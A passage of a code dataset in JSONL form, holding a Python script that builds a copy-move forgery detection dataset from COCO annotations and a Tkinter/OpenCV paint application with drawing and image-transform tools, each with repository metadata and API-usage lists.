"usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 71, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 73, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper.insert_element", "line_number": 74, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 78, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 93, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 97, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 101, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 108, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 112, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 120, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 137, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 138, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 148, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 167, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 167, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 169, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 170, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 177, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 188, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 197, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 199, "usage_type": "call"}, {"api_name": 
"flask.make_response", "line_number": 202, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 214, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 214, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 216, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 223, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 226, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 231, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 235, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 247, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 251, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 254, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 257, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 261, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 261, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 264, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 265, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 268, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 270, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 275, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 279, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 282, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 289, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 299, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 305, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 308, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 313, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 313, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 325, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 328, "usage_type": "call"}, {"api_name": "flask.make_response", 
"line_number": 331, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 334, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 339, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 345, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 351, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 355, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 357, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 361, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 365, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 367, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 371, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 376, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 382, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 384, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 388, "usage_type": "call"}]} +{"seq_id": "40566481823", "text": "#数据及的制作\n\"\"\"\n1: 遍历 annotations keys\n2: 获取图片id\n3: 根据图片id获取改张图片信息\n4: 获取annotations的area数据\n5: 根据面积占比对mask进行筛选,跳过面积占比大于10的mask\n6: 获取segmentation信息\n7: 打开原始图片并裁剪得到mask部分\n 裁剪目标方式,性生成一个只有目标的图片m1\n 对图片以及mask图片进行旋转,缩放,确定上下左右移动位置\n 上下左右移动位置方案:\n\n8: 将原始图片和trans——image图片重叠,得到copy move图片\n9: 生成copy move标签\n10: 将训练图片和标签进行同名分文件及保存\n\"\"\"\nimport json\nimport os\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nfrom crop_test import get_cm_image_mask, get_new_iamge\nfrom utiles import get_annotations, get_id2info_dic\n\n\ndef main():\n source_image_path = '/home/hewaele/Desktop/coco数据集/val2014'\n annotations_path = '/home/hewaele/Desktop/coco数据集/annotations_trainval2014/annotations/instances_val2014.json'\n images_path = '../cmfd_data/images_v2'\n mask_path = '../cmfd_data/mask_v2'\n id2info_path = '../source_data/id2info_dic.json'\n\n count = 0\n id2info_data = get_id2info_dic(id2info_path)\n annotations = get_annotations(annotations_path)\n for pos, annotation in enumerate(annotations[:]):\n image_id = annotation['image_id']\n image_info = id2info_data[str(image_id)]\n annotation_area = annotation['area']\n # print(image_info['file_name'])\n h, w = image_info['height'], image_info['width']\n if 0.0005 <= annotation_area/(h*w) <= 0.1:\n try:\n #获取mask标注信息\n #[x1 y1, x2, y2, x3, y3 ......]\n segmentation = annotation['segmentation'][0]\n image = Image.open(os.path.join(source_image_path, image_info['file_name']))\n image = np.array(image)\n #获得copy move\n trans_image, trans_mask = get_cm_image_mask(image, np.array(segmentation, np.int32).reshape([-1, 2]))\n\n #将原始图片和trans image合并\n new_image = get_new_iamge(image, trans_image, trans_mask)\n # plt.subplot(221)\n # plt.imshow(image)\n # plt.subplot(222)\n # plt.imshow(trans_image)\n # plt.subplot(223)\n # plt.imshow(trans_mask)\n # plt.subplot(224)\n # plt.imshow(new_image)\n # # plt.scatter(segmentation[::2], segmentation[1::2])\n # plt.show()\n # break\n #\n # #将生成的结果图片保存\n save_image = Image.fromarray(new_image)\n save_mask = Image.fromarray(trans_mask)\n save_image.save(os.path.join(images_path, 'image_'+str(count)+'.png'))\n save_mask.save(os.path.join(mask_path, 'mask_'+str(count)+'.png'))\n print(count)\n count += 1\n\n except:\n print('error')\n\n if count >= 150000:\n break\n\n print(count)\n 
print('done')\nif __name__ == '__main__':\n main()\n\n", "repo_name": "hewaele/creat_copy_move", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utiles.get_id2info_dic", "line_number": 36, "usage_type": "call"}, {"api_name": "utiles.get_annotations", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "crop_test.get_cm_image_mask", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "crop_test.get_new_iamge", "line_number": 55, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}]} +{"seq_id": "42548347334", "text": "from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter.colorchooser import askcolor\r\nfrom PIL import ImageTk, Image,ImageColor\r\nimport numpy as np\r\nimport matplotlib as mp\r\nimport cv2\r\nclass Paint(object):\r\n\r\n DEFAULT_PEN_SIZE = 5.0\r\n DEFAULT_COLOR = 'black'\r\n\r\n def __init__(self):\r\n self.root = Tk()\r\n self.root.title('Paint')\r\n self.root.geometry('1200x800')\r\n self.root.maxsize(1920,1080)\r\n self.root.minsize(500,300)\r\n self.original_image=0\r\n self.edited_image=0\r\n self.filtered_image=0\r\n self.img = PhotoImage('pen.png') \r\n \r\n self.paint_tools = Frame(self.root,width=250,height=600,relief=RIDGE,borderwidth=2)\r\n self.paint_tools.place(x=0,y=0)\r\n\r\n self.upload_logo = ImageTk.PhotoImage(Image.open('pen.png'))\r\n self.p = Label(self.paint_tools, text=\"Upload\",borderwidth=0,font=('verdana',10,'bold'))\r\n self.p.place(x=50,y=15)\r\n self.pen_button = Button(self.paint_tools,padx=6,image=self.upload_logo,borderwidth=2,command=self.upload_action)\r\n self.pen_button.place(x=5,y=10)\r\n\r\n self.brush_logo = ImageTk.PhotoImage(Image.open('brush.png'))\r\n self.b = Label(self.paint_tools,borderwidth=0,text='brush',font=('verdana',10,'bold'))\r\n self.b.place(x=50,y=45)\r\n self.brush_button = Button(self.paint_tools,image = self.brush_logo,borderwidth=2,command=self.draw_action) \r\n self.brush_button.place(x=5,y=40)\r\n\r\n self.color_logo = ImageTk.PhotoImage(Image.open('color.png'))\r\n self.cl = Label(self.paint_tools, text='color',font=('verdana',10,'bold'))\r\n self.cl.place(x=50,y=75)\r\n self.color_button = Button(self.paint_tools,image = self.color_logo,borderwidth=2,command=self.choose_color)\r\n self.color_button.place(x=5,y=70)\r\n\r\n self.eraser_logo = ImageTk.PhotoImage(Image.open('eraser.png'))\r\n 
self.e = Label(self.paint_tools, text='eraser',font=('verdana',10,'bold'))\r\n self.e.place(x=50,y=105)\r\n self.eraser_button = Button(self.paint_tools,image = self.eraser_logo,borderwidth=2,command=self.erasef)\r\n self.eraser_button.place(x=5,y=100)\r\n \r\n self.rrotate_logo = ImageTk.PhotoImage(Image.open('right.png').resize((30,30)))\r\n self.e = Label(self.paint_tools, text='right rotate',font=('verdana',10,'bold'))\r\n self.e.place(x=50,y=135)\r\n self.eraser_button = Button(self.paint_tools,image = self.rrotate_logo,borderwidth=2,command=self.rotate_right_action)\r\n self.eraser_button.place(x=5,y=130)\r\n \r\n self.rotateleft_logo = ImageTk.PhotoImage(Image.open('left.png').resize((30,30)))\r\n self.rl = Label(self.paint_tools, text='left rotate',font=('verdana',10,'bold'))\r\n self.rl.place(x=50,y=165)\r\n self.rl_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.rotate_left_action)\r\n self.rl_button.place(x=5,y=160)\r\n \r\n self.translate_logo = ImageTk.PhotoImage(Image.open('translate.png').resize((30,30)))\r\n self.translateimg = Label(self.paint_tools, text='Translate',font=('verdana',10,'bold'))\r\n self.translateimg.place(x=50,y=195)\r\n self.translateimg_button = Button(self.paint_tools,image = self.translate_logo,borderwidth=2,command=self.translate)\r\n self.translateimg_button.place(x=5,y=190)\r\n\r\n\r\n self.bigger_logo = ImageTk.PhotoImage(Image.open('bigger.png').resize((30,30)))\r\n self.biggerimg = Label(self.paint_tools, text='Bigger',font=('verdana',10,'bold'))\r\n self.biggerimg.place(x=50,y=225)\r\n self.biggerimg_button = Button(self.paint_tools,image = self.bigger_logo,borderwidth=2,command=self.scale_bigger)\r\n self.biggerimg_button.place(x=5,y=220)\r\n \r\n self.smaller_logo = ImageTk.PhotoImage(Image.open('smaller.png').resize((30,30)))\r\n self.smallerimg = Label(self.paint_tools, text='Smaller',font=('verdana',10,'bold'))\r\n self.smallerimg.place(x=50,y=255)\r\n self.smallerimg_button = Button(self.paint_tools,image = self.smaller_logo,borderwidth=2,command=self.scale_smaller)\r\n self.smallerimg_button.place(x=5,y=250)\r\n\r\n self.skew_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.skewimg = Label(self.paint_tools, text='Skew',font=('verdana',10,'bold'))\r\n self.skewimg.place(x=50,y=285)\r\n self.skewimg_button = Button(self.paint_tools,image = self.skew_logo,borderwidth=2,command=self.skew)\r\n self.skewimg_button.place(x=5,y=280)\r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='wrapx',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=315)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.wrapx)\r\n self.saveimg_button.place(x=5,y=310)\r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='wrapy',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=345)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.wrapy)\r\n self.saveimg_button.place(x=5,y=340)\r\n \r\n \r\n self.save_logo = ImageTk.PhotoImage(Image.open('eraser.png').resize((30,30)))\r\n self.saveimg = Label(self.paint_tools, text='save',font=('verdana',10,'bold'))\r\n self.saveimg.place(x=50,y=375)\r\n self.saveimg_button = Button(self.paint_tools,image = self.rotateleft_logo,borderwidth=2,command=self.save_action)\r\n 
self.saveimg_button.place(x=5,y=370)\r\n \r\n \r\n self.pen_size = Label(self.paint_tools,text=\"Brush Size\",font=('verdana',10,'bold'))\r\n self.pen_size.place(x=15,y=520)\r\n self.choose_size_button = Scale(self.paint_tools, from_=1, to=20, orient=VERTICAL)\r\n self.choose_size_button.place(x=20,y=420)\r\n \r\n\r\n self.c = Canvas(self.root ,height=1000,width=1000)\r\n self.c.place(x=250,y=0)\r\n\r\n self.setup()\r\n self.root.mainloop()\r\n\r\n def setup(self):\r\n self.old_x = None\r\n self.old_y = None\r\n self.c.create_image(100,100,anchor=NW,image=self.img)\r\n self.c.image = self.img \r\n self.line_width = self.choose_size_button.get()\r\n self.color_code = self.DEFAULT_COLOR\r\n self.erase = False\r\n self.active_button = self.brush_button\r\n \r\n # self.c.bind('', self.paint)\r\n # self.c.bind('', self.reset)\r\n\r\n # def use_pen(self):\r\n # self.activate_button(self.pen_button)\r\n\r\n # def use_brush(self):\r\n # self.activate_button(self.brush_button)\r\n\r\n # def choose_color(self):\r\n # self.eraser_on = False\r\n # self.color = askcolor(color=self.color)[1]\r\n\r\n # de f use_eraser(self):\r\n # self.activate_button(self.eraser_button, eraser_mode=True)\r\n\r\n # def activate_button(self, some_button, eraser_mode=False):\r\n # self.active_button.config(relief=RAISED)\r\n # some_button.config(relief=SUNKEN)\r\n # self.active_button = some_button\r\n # self.eraser_on = eraser_mode\r\n\r\n # def paint(self, event):\r\n # self.line_width = self.choose_size_button.get()\r\n # paint_color = 'white' if self.eraser_on else self.color\r\n # if self.old_x and self.old_y:\r\n # self.c.create_line(self.old_x, self.old_y, event.x, event.y,\r\n # width=self.line_width, fill=paint_color,\r\n # capstyle=ROUND, smooth=TRUE, splinesteps=36)\r\n # self.old_x = event.x\r\n # self.old_y = event.y\r\n def erasef(self):\r\n self.erase=True\r\n \r\n def draw_action(self):\r\n self.c.bind(\"\", self.start_draw)\r\n self.c.bind(\"\", self.draw)\r\n\r\n def choose_color(self):\r\n self.color_code = askcolor(color=self.color_code)[1]\r\n\r\n def start_draw(self, event):\r\n self.x = event.x\r\n self.y = event.y\r\n self.draw_ids = []\r\n \r\n \r\n def draw(self, event):\r\n # print(self.draw_ids)\r\n if self.erase:\r\n self.line_width = self.choose_size_button.get()\r\n self.draw_ids.append(self.c.create_line(self.x, self.y, event.x, event.y, width=self.line_width,\r\n fill='#ffffff', capstyle=ROUND, smooth=True))\r\n cv2.line(self.filtered_image, (int(self.x * self.ratio), int(self.y * self.ratio)),\r\n (int(event.x * self.ratio), int(event.y * self.ratio)),\r\n (255,255,255) , thickness=self.line_width,\r\n lineType=8)\r\n self.x = event.x\r\n self.y = event.y\r\n else:\r\n self.line_width = self.choose_size_button.get()\r\n self.draw_ids.append(self.c.create_line(self.x, self.y, event.x, event.y, width=self.line_width,\r\n fill=self.color_code, capstyle=ROUND, smooth=True))\r\n RGB = ImageColor.getcolor(self.color_code,'RGB')\r\n R= RGB[0]\r\n G= RGB[1]\r\n B= RGB[2]\r\n cv2.line(self.filtered_image, (int(self.x * self.ratio), int(self.y * self.ratio)),\r\n (int(event.x * self.ratio), int(event.y * self.ratio)),\r\n (B,G,R) , thickness=self.line_width,\r\n lineType=8)\r\n self.x = event.x\r\n self.y = event.y\r\n \r\n # def refresh_side_frame(self):\r\n # try:\r\n # self.side_frame.grid_forget()\r\n # except:\r\n # pass\r\n # self.c.unbind(\"\")\r\n # self.c.unbind(\"\")\r\n # self.c.unbind(\"\")\r\n # self.display_image(self.filtered_image)\r\n # self.side_frame = 
self.brush_button.Frame(self.frame_menu)\r\n # self.side_frame.grid(row=0, column=4, rowspan=10)\r\n # self.side_frame.config(relief=GROOVE, padding=(50, 15))\r\n \r\n \r\n def upload_action(self):\r\n self.c.delete(\"all\")\r\n self.filename = filedialog.askopenfilename()\r\n self.original_image = cv2.imread(self.filename)\r\n self.edited_image = cv2.imread(self.filename)\r\n self.filtered_image = cv2.imread(self.filename)\r\n self.display_image(self.edited_image)\r\n \r\n \r\n def rotate_left_action(self):\r\n self.filtered_image = cv2.rotate(\r\n self.filtered_image, cv2.ROTATE_90_COUNTERCLOCKWISE)\r\n self.display_image(self.filtered_image)\r\n\r\n\r\n def rotate_right_action(self):\r\n self.filtered_image = cv2.rotate(\r\n self.filtered_image, cv2.ROTATE_90_CLOCKWISE)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def scale_smaller(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 0.8, fy = 0.8)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def wrapx(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1.2, fy = 1)\r\n self.display_image(self.filtered_image)\r\n \r\n def wrapy(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1, fy = 1.2)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n \r\n \r\n def scale_bigger(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1.2, fy = 1.2)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def translate(self):\r\n \r\n height, width = self.filtered_image.shape[:2]\r\n quarter_height, quarter_width = height / 4, width / 4\r\n T = np.float32([[1, 0, quarter_width], [0, 1, quarter_height]])\r\n self.filtered_image = cv2.warpAffine(self.filtered_image, T, (width, height))\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def skew(self):\r\n rows, cols,c= self.filtered_image.shape\r\n M = np.float32([[1, 0.5, 0],\r\n \t[0, 1 , 0],\r\n \t[0, 0 , 1]]) \r\n self.filtered_image = cv2.warpPerspective(self.filtered_image,M,(int(cols*1.5),int(rows*1.5)))\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def display_image(self, image=None):\r\n self.c.delete(\"all\")\r\n if image is None:\r\n image = self.edited_image.copy()\r\n else:\r\n image = image\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n height, width , channel = image.shape\r\n ratio = height / width\r\n\r\n new_width = width\r\n new_height = height\r\n\r\n # if height > 400 or width > 300:\r\n # if ratio < 1:\r\n # new_width = 300\r\n # new_height = int(new_width * ratio)\r\n # else:\r\n # new_height = 400\r\n # new_width = int(new_height * (width / height))\r\n\r\n self.ratio = height / new_height\r\n self.new_image = cv2.resize(image, (new_width, new_height))\r\n\r\n self.new_image = ImageTk.PhotoImage(\r\n Image.fromarray(self.new_image))\r\n\r\n self.c.config(width=new_width, height=new_height)\r\n self.c.create_image(\r\n new_width / 2, new_height / 2, image=self.new_image)\r\n \r\n def save_action(self):\r\n original_file_type = self.filename.split('.')[-1]\r\n filename = filedialog.asksaveasfilename()\r\n filename = filename + \".\" + original_file_type\r\n\r\n save_as_image = self.filtered_image\r\n cv2.imwrite(filename, save_as_image)\r\n self.filename = filename\r\n \r\n # def reset(self, event):\r\n # self.old_x, 
self.old_y = None, None\r\n\r\nPaint()", "repo_name": "Ribal-Dahdal/Paint-App", "sub_path": "paint.py", "file_name": "paint.py", "file_ext": "py", "file_size_in_byte": 14276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 45, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 45, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 82, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 82, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", 
"line_number": 94, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 94, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 94, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 101, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 101, "usage_type": "name"}, {"api_name": "tkinter.colorchooser.askcolor", "line_number": 169, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 183, "usage_type": "call"}, {"api_name": "PIL.ImageColor.getcolor", "line_number": 193, "usage_type": "call"}, {"api_name": "PIL.ImageColor", "line_number": 193, "usage_type": "name"}, {"api_name": "cv2.line", "line_number": 197, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 220, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 220, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 222, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 223, "usage_type": "call"}, {"api_name": "cv2.rotate", "line_number": 228, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_COUNTERCLOCKWISE", "line_number": 229, "usage_type": "attribute"}, {"api_name": "cv2.rotate", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_CLOCKWISE", "line_number": 235, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 247, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 268, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 275, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 278, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 288, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 288, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 304, "usage_type": "call"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 306, 